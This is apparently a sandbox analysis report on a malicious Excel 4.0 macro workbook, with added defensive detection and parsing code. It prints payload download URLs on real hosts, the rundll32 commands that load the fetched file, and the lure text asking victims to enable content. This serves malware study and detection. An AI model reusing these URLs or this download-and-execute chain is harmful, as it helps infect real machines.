
Analysis Report SecuriteInfo.com.XF.AShadow.4960.21593.8307

Overview

General Information

Sample Name:SecuriteInfo.com.XF.AShadow.4960.21593.8307 (renamed file extension from 8307 to xls)
Analysis ID:357282
MD5:b00ae2a23ee80960d42e155f9814b490
SHA1:7673823a676d34a46128f8f6d7f09e8b2f3d8db4
SHA256:80d0f40411596b3f2350399c4d76f19d892771f835c1b2f6e3c77955e72e784f

Detection

Hidden Macro 4.0 | Score: 84 (range 0 - 100) | Whitelisted: false | Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Document contains embedded VBA macros
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

Classification label: mal84.expl.evad.winXLS@11/13@6/4

Process tree
  • System is w7x64
  • EXCEL.EXE (PID: 2516 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2924 cmdline: rundll32 ..\JDFR.hdfgr,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2892 cmdline: rundll32 ..\JDFR.hdfgr1,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2876 cmdline: rundll32 ..\JDFR.hdfgr2,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2512 cmdline: rundll32 ..\JDFR.hdfgr3,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 3036 cmdline: rundll32 ..\JDFR.hdfgr4,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)

Malware Configuration

No configs have been found
Yara matches (initial sample):

Source | Rule | Description | Author
SecuriteInfo.com.XF.AShadow.4960.21593.xls | SUSP_EnableContent_String_Gen | Detects suspicious string that asks to enable active content in Office Doc | Florian Roth
  Strings:
  • 0xadf2:$e1: Enable Editing
  • 0xae3c:$e1: Enable Editing
  • 0x158cc:$e1: Enable Editing
  • 0x15916:$e1: Enable Editing
  • 0x20083:$e1: Enable Editing
  • 0x200cd:$e1: Enable Editing
  • 0xae5a:$e2: Enable Content
  • 0x15934:$e2: Enable Content
  • 0x200eb:$e2: Enable Content
SecuriteInfo.com.XF.AShadow.4960.21593.xls | JoeSecurity_HiddenMacro | Yara detected hidden Macro 4.0 in Excel | Joe Security

    Sigma Overview

    System Summary:

    Sigma detected: Microsoft Office Product Spawning Windows Shell
    Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team
    Data:
      Command: rundll32 ..\JDFR.hdfgr,DllRegisterServer
      CommandLine: rundll32 ..\JDFR.hdfgr,DllRegisterServer
      CommandLine|base64offset|contains: ]
      Image: C:\Windows\System32\rundll32.exe
      NewProcessName: C:\Windows\System32\rundll32.exe
      OriginalFileName: C:\Windows\System32\rundll32.exe
      ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      ParentProcessId: 2516
      ProcessCommandLine: rundll32 ..\JDFR.hdfgr,DllRegisterServer
      ProcessId: 2924
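The process-creation event above is the kind of record the Sigma rule fires on. The following is an added example, not part of the Joe Sandbox report or of the Sigma project: it re-implements the rule's logic (Office parent, shell or script-host child) and adds a second, stricter check that is this example's own assumption, for rundll32 calling DllRegisterServer on a module given by a relative path or with a non-library extension, which is exactly the shape of `rundll32 ..\JDFR.hdfgr,DllRegisterServer`. The parent/child name lists are shortened versions written for this example, not the rule's exact lists, and the events are constructed Sysmon Event ID 1-style records, the first of which reproduces the process start recorded in this report.

```python
"""Added example (not from the report or the Sigma rule): two process-creation checks
run over constructed Sysmon Event ID 1-style records."""
import re
from pathlib import PureWindowsPath
from typing import Dict, Optional

# Shortened lists written for this example (assumption; not the Sigma rule's exact lists).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "msaccess.exe",
                  "mspub.exe", "outlook.exe", "visio.exe", "eqnedt32.exe"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                  "mshta.exe", "rundll32.exe", "regsvr32.exe", "msiexec.exe",
                  "certutil.exe", "bitsadmin.exe", "schtasks.exe", "wmic.exe"}
LIBRARY_EXTS = {".dll", ".ocx", ".cpl", ".ax"}

# rundll32 syntax: [path\]rundll32[.exe] <module>,<export> [arguments]
RUNDLL_RE = re.compile(
    r'^\s*"?(?:[^"\s]*\\)?rundll32(?:\.exe)?"?\s+"?(?P<module>[^",]+?)"?\s*,\s*'
    r'(?P<export>[A-Za-z_]\w*)', re.IGNORECASE)


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def office_spawns_shell(ev: Dict[str, object]) -> bool:
    """Logic of 'Microsoft Office Product Spawning Windows Shell': Office parent, shell child."""
    return (basename(str(ev["ParentImage"])) in OFFICE_PARENTS
            and basename(str(ev["Image"])) in SHELL_CHILDREN)


def rundll32_odd_module(ev: Dict[str, object]) -> Optional[Dict[str, object]]:
    """Extra check (this example's assumption): rundll32 <module>,DllRegisterServer where the
    module is not an absolute path to a *.dll/*.ocx/*.cpl/*.ax file. Returns details or None."""
    if basename(str(ev["Image"])) != "rundll32.exe":
        return None
    m = RUNDLL_RE.match(str(ev["CommandLine"]))
    if not m or m.group("export").lower() != "dllregisterserver":
        return None
    module = m.group("module").strip()
    p = PureWindowsPath(module)
    relative = not p.is_absolute()          # '..\JDFR.hdfgr' and bare names are relative
    odd_ext = p.suffix.lower() not in LIBRARY_EXTS
    if relative or odd_ext:
        return {"module": module, "export": m.group("export"),
                "extension": p.suffix.lower(), "relative_path": relative}
    return None


def triage(events):
    """Run both checks over a list of events; return one hit record per flagged event."""
    hits = []
    for ev in events:
        reasons = []
        if office_spawns_shell(ev):
            reasons.append("office_product_spawning_windows_shell")
        odd = rundll32_odd_module(ev)
        if odd:
            reasons.append("rundll32_dllregisterserver_odd_module")
        if reasons:
            hits.append({"ProcessId": ev["ProcessId"], "reasons": reasons, "rundll32": odd})
    return hits


# Constructed events. The first reproduces the process creation in this report; the
# other three are benign look-alikes made up for contrast.
EXCEL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"
RUNDLL = r"C:\Windows\System32\rundll32.exe"
SAMPLE_EVENTS = [
    {"ProcessId": 2924, "Image": RUNDLL,
     "CommandLine": r"rundll32 ..\JDFR.hdfgr,DllRegisterServer",
     "ParentProcessId": 2516, "ParentImage": EXCEL,
     "ParentCommandLine": "'" + EXCEL + "' /automation -Embedding"},
    {"ProcessId": 4100, "Image": RUNDLL,   # Control Panel applet launched from Explorer
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
     "ParentProcessId": 1200, "ParentImage": r"C:\Windows\explorer.exe",
     "ParentCommandLine": "explorer.exe"},
    {"ProcessId": 4212, "Image": r"C:\Windows\splwow64.exe",   # Excel printing, not a shell
     "CommandLine": r"C:\Windows\splwow64.exe 12288",
     "ParentProcessId": 2516, "ParentImage": EXCEL,
     "ParentCommandLine": "'" + EXCEL + "' /automation -Embedding"},
    {"ProcessId": 4300, "Image": RUNDLL,   # installer registering a COM server by absolute path
     "CommandLine": r'rundll32.exe "C:\Program Files\Vendor\comsrv.dll",DllRegisterServer',
     "ParentProcessId": 4280, "ParentImage": r"C:\Users\user\Downloads\setup.exe",
     "ParentCommandLine": "setup.exe"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```

Only the report's own event is flagged, on both checks; the Explorer-launched applet, the print helper spawned by Excel and the installer's absolute-path DllRegisterServer all pass, which is the false-positive profile you want before deploying the second check as a hunting query.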

    Signature Overview

    AV Detection:

    Antivirus detection for URL or domain
    Source: http://pathinanchilearthmovers.com/eznwcdhx/44251495573726900000.dat | Avira URL Cloud: Label: malware

    Compliance:

    Uses new MSVCR Dlls
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Uses secure TLS version for HTTPS connections
    Source: unknown | HTTPS traffic detected: 138.36.237.100:443 -> 192.168.2.22:49170 version: TLS 1.2

    Software Vulnerabilities:

    Document exploit detected (UrlDownloadToFile)
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
    Document exploit detected (process start blacklist hit)
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe
    Note: "Document exploit" is the sandbox's signature family name; nothing in this report shows a software vulnerability being exploited. The chain recorded here (URLDownloadToFileA resolved inside EXCEL.EXE, HTTP GET requests for a .dat file, then EXCEL.EXE starting rundll32 ..\JDFR.hdfgr,DllRegisterServer) is driven by the hidden Excel 4.0 macro and requires the user to click Enable Editing and then Enable Content, which is what the lure text on the sheet asks for.

    Networking:

    Source: global traffic | DNS query: name: rzminc.com
    Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 138.36.237.100:443
    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 72.52.227.180:80
    Source: Joe Sandbox View | IP Address: 162.241.80.6
    Source: Joe Sandbox View | IP Address: 138.36.237.100
    Source: Joe Sandbox View | IP Address: 68.66.216.42
    Source: Joe Sandbox View | IP Address: 72.52.227.180
    Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
    HTTP requests (all five carry the same headers: Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Connection: Keep-Alive):
    Source: global traffic | HTTP traffic detected: GET /xklyulyijvn/44251495573726900000.dat HTTP/1.1 | Host: rzminc.com
    Source: global traffic | HTTP traffic detected: GET /eznwcdhx/44251495573726900000.dat HTTP/1.1 | Host: pathinanchilearthmovers.com
    Source: global traffic | HTTP traffic detected: GET /xjzpfwc/44251495573726900000.dat HTTP/1.1 | Host: jugueterialatorre.com.ar
    Source: global traffic | HTTP traffic detected: GET /fdzgprclatqo/44251495573726900000.dat HTTP/1.1 | Host: rzminc.com
    Source: global traffic | HTTP traffic detected: GET /otmchxmxeg/44251495573726900000.dat HTTP/1.1 | Host: biblicalisraeltours.com
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ
    Memory-dump sources for the string findings below (rundll32.exe process dumps):
      [A] rundll32.exe, 00000003.00000002.2135248089.0000000001AA0000.00000002.00000001.sdmp, 00000004.00000002.2129180884.0000000001C20000.00000002.00000001.sdmp, 00000005.00000002.2120797082.0000000001BE0000.00000002.00000001.sdmp, 00000006.00000002.2117147505.0000000001B30000.00000002.00000001.sdmp
      [B] rundll32.exe, 00000003.00000002.2135422495.0000000001C87000.00000002.00000001.sdmp, 00000004.00000002.2129380276.0000000001E07000.00000002.00000001.sdmp, 00000005.00000002.2121238818.0000000001DC7000.00000002.00000001.sdmp, 00000006.00000002.2117336102.0000000001D17000.00000002.00000001.sdmp
      [C] rundll32.exe, 00000006.00000002.2117147505.0000000001B30000.00000002.00000001.sdmp
    Source: [A] | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
    Source: unknown | DNS traffic detected: queries for: rzminc.com
    Source: [A] | String found in binary or memory: http://investor.msn.com
    Source: [A] | String found in binary or memory: http://investor.msn.com/
    Source: [B] | String found in binary or memory: http://localizability/practices/XML.asp
    Source: [B] | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
    Source: [B] | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
    Source: [B] | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
    Source: [A] | String found in binary or memory: http://www.hotmail.com/oe
    Source: [B] | String found in binary or memory: http://www.icra.org/vocabulary/.
    Source: [A] | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
    Source: [C] | String found in binary or memory: http://www.windows.com/pctv.
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49170
    Source: unknown | Network traffic detected: HTTP traffic on port 49170 -> 443
    Source: unknown | HTTPS traffic detected: 138.36.237.100:443 -> 192.168.2.22:49170 version: TLS 1.2
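The five GET requests above all ask for the same file name from different hosts and path directories, which makes the file name and path shape a better hunting pivot than any single domain. The following added example (not from the report) parses raw HTTP/1.1 requests into URLs and clusters them by file name and by a generalised path pattern. The input is constructed: the report's five requests rebuilt in wire format with the same hosts, paths and User-Agent, so the parser runs offline.

```python
"""Added example (not part of the report): parse raw HTTP requests and cluster them by
requested file name and by generalised path shape."""
import re
from collections import defaultdict
from typing import Dict, List
from urllib.parse import urlsplit

# User-Agent exactly as captured in the report (MSIE 7.0 with Trident/7.0).
UA = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; "
      ".NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
      "Media Center PC 6.0; .NET4.0C; .NET4.0E)")


def build_request(host: str, path: str, ua: str = UA) -> str:
    """Rebuild a request in wire format (used only to construct the sample input)."""
    return (f"GET {path} HTTP/1.1\r\nAccept: */*\r\nUA-CPU: AMD64\r\n"
            f"Accept-Encoding: gzip, deflate\r\nUser-Agent: {ua}\r\n"
            f"Host: {host}\r\nConnection: Keep-Alive\r\n\r\n")


# Constructed captures: the five requests the report lists, in the order shown.
CAPTURED: List[str] = [build_request(h, p) for h, p in [
    ("rzminc.com", "/xklyulyijvn/44251495573726900000.dat"),
    ("pathinanchilearthmovers.com", "/eznwcdhx/44251495573726900000.dat"),
    ("jugueterialatorre.com.ar", "/xjzpfwc/44251495573726900000.dat"),
    ("rzminc.com", "/fdzgprclatqo/44251495573726900000.dat"),
    ("biblicalisraeltours.com", "/otmchxmxeg/44251495573726900000.dat"),
]]


def parse_request(raw: str) -> Dict[str, str]:
    """Parse one HTTP/1.x request head into method, host, path, absolute URL and UA."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, version = request_line.split(" ", 2)
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    host = headers.get("host", "")
    # Proxy-style requests carry an absolute URL in the request line; origin-form ones do not.
    url = target if target.startswith(("http://", "https://")) else f"http://{host}{target}"
    parts = urlsplit(url)
    return {"method": method, "version": version, "host": parts.netloc,
            "path": parts.path, "url": url, "ua": headers.get("user-agent", "")}


def path_shape(path: str) -> str:
    """Generalise a path into a regex: lowercase-letter runs -> [a-z]+, digit runs -> \\d+,
    everything else (including the extension) kept literal. Good enough for the lowercase
    paths seen here; a production hunt pattern would also bound the run lengths."""
    stem, dot, ext = path.rpartition(".")
    if not dot:
        stem, ext = path, ""
    out = []
    for tok in re.findall(r"[a-z]+|\d+|.", stem):
        if re.fullmatch(r"\d+", tok):
            out.append(r"\d+")
        elif re.fullmatch(r"[a-z]+", tok):
            out.append("[a-z]+")
        else:
            out.append(tok if tok == "/" else re.escape(tok))
    return "".join(out) + (r"\." + re.escape(ext) if dot else "")


def cluster(requests: List[Dict[str, str]]) -> Dict[str, Dict[str, set]]:
    """Group URLs by requested file name, and hosts by generalised path shape."""
    by_name: Dict[str, set] = defaultdict(set)
    by_shape: Dict[str, set] = defaultdict(set)
    for r in requests:
        by_name[r["path"].rsplit("/", 1)[-1]].add(r["url"])
        by_shape[path_shape(r["path"])].add(r["host"])
    return {"by_filename": dict(by_name), "by_shape": dict(by_shape)}


def payload_hosts(requests: List[Dict[str, str]], filename: str) -> List[str]:
    """Distinct hosts that were asked for the same file name (the download rotation)."""
    return sorted({r["host"] for r in requests if r["path"].endswith("/" + filename)})


if __name__ == "__main__":
    reqs = [parse_request(r) for r in CAPTURED]
    for shape, hosts in cluster(reqs)["by_shape"].items():
        print(f"shape {shape!r} served by {len(hosts)} hosts: {', '.join(sorted(hosts))}")
    print("hosts for 44251495573726900000.dat:", payload_hosts(reqs, "44251495573726900000.dat"))
```

All five requests collapse to one shape, `/[a-z]+/\d+\.dat`, served by four hosts, and the rotation (rzminc.com is tried twice under different directories) is visible without any of the vendor verdicts listed later in this report.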

    System Summary:

    Found malicious Excel 4.0 Macro
    Source: SecuriteInfo.com.XF.AShadow.4960.21593.xls | Initial sample: urlmon
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
    Source: Screenshot number: 4 | Screenshot OCR: Enable Editing, please click Enabk 14 from the yellow bar above f y-t."|| I xa I 15 " lnn|| I F?
    Source: Screenshot number: 8 | Screenshot OCR: Enable Editing, please click Enabli " ' ' 14 from the yellow bar above RunDLL |~| 15 16 Therewas
    Source: Screenshot number: 12 | Screenshot OCR: Enable Editing, please click Enable Content 14 1 from the yellow bar above 15 CI 0 16 ' 17 I 18
    Source: Screenshot number: 12 | Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 CI 0 16 ' 17 I 18 I WHY I CANNOTOPEN THIS DocU
    Source: Document image extraction number: 2 | Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
    Source: Document image extraction number: 2 | Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
    Source: Document image extraction number: 8 | Screenshot OCR: Enable Editing from the yellow bar above @Once You have Enable Editing, please click Enable Conten
    Source: Document image extraction number: 8 | Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? m You are using IDS or And
    Found Excel 4.0 Macro with suspicious formulas
    Source: SecuriteInfo.com.XF.AShadow.4960.21593.xls | Initial sample: EXEC
    Source: SecuriteInfo.com.XF.AShadow.4960.21593.xls | OLE indicator, VBA macros: true
    Source: SecuriteInfo.com.XF.AShadow.4960.21593.xls, type: SAMPLE | Matched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
    Source: rundll32.exe, 00000003.00000002.2135248089.0000000001AA0000.00000002.00000001.sdmp, 00000004.00000002.2129180884.0000000001C20000.00000002.00000001.sdmp, 00000005.00000002.2120797082.0000000001BE0000.00000002.00000001.sdmp, 00000006.00000002.2117147505.0000000001B30000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
    Source: classification engine | Classification label: mal84.expl.evad.winXLS@11/13@6/4
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\5BCE0000
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRC457.tmp
    Source: SecuriteInfo.com.XF.AShadow.4960.21593.xls | OLE indicator, Workbook stream: true
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
    Source: unknown | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr,DllRegisterServer
    Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknown | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr,DllRegisterServer
    Source: unknown | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr1,DllRegisterServer
    Source: unknown | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr2,DllRegisterServer
    Source: unknown | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr3,DllRegisterServer
    Source: unknown | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr4,DllRegisterServer
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr,DllRegisterServer
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr1,DllRegisterServer
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr2,DllRegisterServer
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr3,DllRegisterServer
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr4,DllRegisterServer
    Source: C:\Windows\System32\rundll32.exe | Automated click: OK (5 occurrences)
    Source: Window Recorder | Window detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (25 occurrences)
    Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX (5 occurrences)

    HIPS / PFW / Operating System Protection Evasion:

    Yara detected hidden Macro 4.0 in Excel
    Source: Yara match | File source: SecuriteInfo.com.XF.AShadow.4960.21593.xls, type: SAMPLE
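The structural fact behind a "hidden Macro 4.0" verdict is a BoundSheet8 record in the workbook globals stream whose sheet type is an Excel 4.0 macro sheet and whose visibility state is hidden or very hidden. The following added example (not from the report, and not Joe Security's or anyone else's detection code) walks a BIFF8 record stream and reports exactly those sheets. The record stream is constructed inline, so the example runs offline; for a real .xls you would pass in the `Workbook` OLE stream, for instance `olefile.OleFileIO(path).openstream("Workbook").read()`. Field layout follows the MS-XLS BoundSheet8 definition (lbPlyPos, hsState, dt, ShortXLUnicodeString name); the sheet names and stream offsets are made up.

```python
"""Added example (not part of the report): find hidden / very hidden Excel 4.0 macro sheets
by parsing BOUNDSHEET records in a BIFF8 workbook globals stream."""
import struct
from typing import Dict, Iterator, List, Tuple

RT_BOF = 0x0809
RT_BOUNDSHEET = 0x0085
RT_EOF = 0x000A
SHEET_TYPES = {0x00: "worksheet", 0x01: "xlm_macro", 0x02: "chart", 0x06: "vba_module"}
HIDDEN_STATES = {0: "visible", 1: "hidden", 2: "very_hidden"}


def iter_records(stream: bytes) -> Iterator[Tuple[int, bytes]]:
    """Yield (record_type, payload) for each BIFF record: 2-byte type, 2-byte length, body."""
    off = 0
    while off + 4 <= len(stream):
        rt, ln = struct.unpack_from("<HH", stream, off)
        yield rt, stream[off + 4: off + 4 + ln]
        off += 4 + ln


def parse_boundsheet(payload: bytes) -> Dict[str, object]:
    """Decode a BoundSheet8 body: lbPlyPos (4), hsState (1, low 2 bits), dt (1),
    then a ShortXLUnicodeString (cch, flags, chars)."""
    pos, flags, dt, cch, grbit = struct.unpack_from("<IBBBB", payload, 0)
    raw = payload[8:]
    if grbit & 0x01:                      # fHighByte set: UTF-16LE characters
        name = raw[:cch * 2].decode("utf-16-le")
    else:                                 # single-byte characters (codepage); latin-1 stand-in
        name = raw[:cch].decode("latin-1")
    return {"bof_pos": pos, "state": HIDDEN_STATES.get(flags & 0x03, "reserved"),
            "type": SHEET_TYPES.get(dt, f"unknown_{dt:#x}"), "name": name}


def find_hidden_macro_sheets(stream: bytes) -> List[Dict[str, object]]:
    """Return every sheet that is an Excel 4.0 macro sheet and is not visible."""
    sheets = [parse_boundsheet(p) for rt, p in iter_records(stream) if rt == RT_BOUNDSHEET]
    return [s for s in sheets if s["type"] == "xlm_macro" and s["state"] != "visible"]


# --- constructed sample stream (builders exist only to make the example self-contained) ---
def rec(rt: int, payload: bytes) -> bytes:
    return struct.pack("<HH", rt, len(payload)) + payload


def boundsheet(pos: int, state: int, dt: int, name: str, wide: bool = False) -> bytes:
    chars = name.encode("utf-16-le") if wide else name.encode("latin-1")
    return rec(RT_BOUNDSHEET, struct.pack("<IBBBB", pos, state, dt, len(name), 1 if wide else 0) + chars)


SAMPLE_STREAM = (
    rec(RT_BOF, struct.pack("<HHHHII", 0x0600, 0x0005, 0x0DBB, 0x07CC, 0, 0x0006))  # BIFF8 BOF
    + boundsheet(0x0400, 0, 0x00, "Sheet1")               # visible worksheet (the lure page)
    + boundsheet(0x2000, 2, 0x01, "Macro1")               # very hidden Excel 4.0 macro sheet
    + boundsheet(0x3000, 1, 0x00, "Data")                 # hidden ordinary worksheet (benign)
    + boundsheet(0x4000, 1, 0x01, "Módulo", wide=True)    # hidden macro sheet, UTF-16 name
    + rec(RT_EOF, b"")
)

if __name__ == "__main__":
    for s in find_hidden_macro_sheets(SAMPLE_STREAM):
        print(f"{s['name']!r}: {s['state']} {s['type']} (substream BOF at {s['bof_pos']:#x})")
```

A hidden ordinary worksheet is not flagged on its own; it is the combination of macro-sheet type and non-visible state that matters, since a very hidden macro sheet cannot be unhidden from the Excel UI and is invisible to a user who was just talked into clicking Enable Content.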

    Mitre Att&ck Matrix

    Techniques flagged for this sample (the number in parentheses is the figure shown beside the technique in the source matrix; the unnumbered cells of the original grid are the empty template and are omitted):

    Execution: Scripting (21), Exploitation for Client Execution (23)
    Privilege Escalation: Process Injection (1)
    Defense Evasion: Masquerading (1), Disable or Modify Tools (1), Rundll32 (1), Process Injection (1), Scripting (21)
    Discovery: File and Directory Discovery (1), System Information Discovery (2)
    Command and Control: Encrypted Channel (2), Non-Application Layer Protocol (2), Application Layer Protocol (13), Ingress Tool Transfer (2)
    No techniques flagged under: Initial Access, Persistence, Credential Access, Lateral Movement, Collection, Exfiltration, Network Effects, Remote Service Effects, Impact
    Behavior Graph

    [Graph not rendered in this capture; the information it carried:]
    Behavior Graph ID: 357282 | Sample: SecuriteInfo.com.XF.AShadow... | Start date: 24/02/2021 | Architecture: WINDOWS | Score: 84
    Top-level signatures: Antivirus detection for URL or domain; Found malicious Excel 4.0 Macro; Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros); 3 other signatures
    Process: EXCEL.EXE (graph counters 90 and 52) started
      Network: pathinanchilearthmovers.com 162.241.80.6, ports 49168 -> 80, UNIFIEDLAYER-AS-1US, United States
      Network: rzminc.com 72.52.227.180, ports 49167, 49174 -> 80, LIQUIDWEBUS, United States
      Network: 3 other IPs or domains
      Signatures on EXCEL.EXE: Document exploit detected (process start blacklist hit); Document exploit detected (UrlDownloadToFile)
      Children: rundll32.exe started (3 shown) plus 2 other processes

    Antivirus and URL reputation results

    No Antivirus matches (reported for each of the four scanned categories)

    Source | Detection | Scanner | Label
    http://www.icra.org/vocabulary/. | 0% | URL Reputation (listed 3 times) | safe
    http://rzminc.com/xklyulyijvn/44251495573726900000.dat | 0% | Avira URL Cloud | safe
    http://pathinanchilearthmovers.com/eznwcdhx/44251495573726900000.dat | 100% | Avira URL Cloud | malware
    http://jugueterialatorre.com.ar/xjzpfwc/44251495573726900000.dat | 0% | Avira URL Cloud | safe
    http://biblicalisraeltours.com/otmchxmxeg/44251495573726900000.dat | 0% | Avira URL Cloud | safe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation (listed 3 times) | safe
    http://rzminc.com/fdzgprclatqo/44251495573726900000.dat | 0% | Avira URL Cloud | safe
    Domains

    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    rzminc.com | 72.52.227.180 | true | false | - | unknown
    biblicalisraeltours.com | 68.66.216.42 | true | false | - | unknown
    crt.sectigo.com | 91.199.212.52 | true | false | - | unknown
    jugueterialatorre.com.ar | 138.36.237.100 | true | false | - | unknown
    pathinanchilearthmovers.com | 162.241.80.6 | true | false | - | unknown
    crt.sectigo.com is a certificate-authority distribution host (Sectigo); its appearance next to the TLS 1.2 connection to 138.36.237.100 (jugueterialatorre.com.ar) is consistent with certificate-chain validation by the client rather than with command and control, so do not treat it as an indicator. The other four domains are the download hosts from the HTTP evidence above.
    Contacted URLs

    Name | Malicious | Antivirus Detection | Reputation
    http://rzminc.com/xklyulyijvn/44251495573726900000.dat | false | Avira URL Cloud: safe | unknown
    http://pathinanchilearthmovers.com/eznwcdhx/44251495573726900000.dat | true | Avira URL Cloud: malware | unknown
    http://jugueterialatorre.com.ar/xjzpfwc/44251495573726900000.dat | false | Avira URL Cloud: safe | unknown
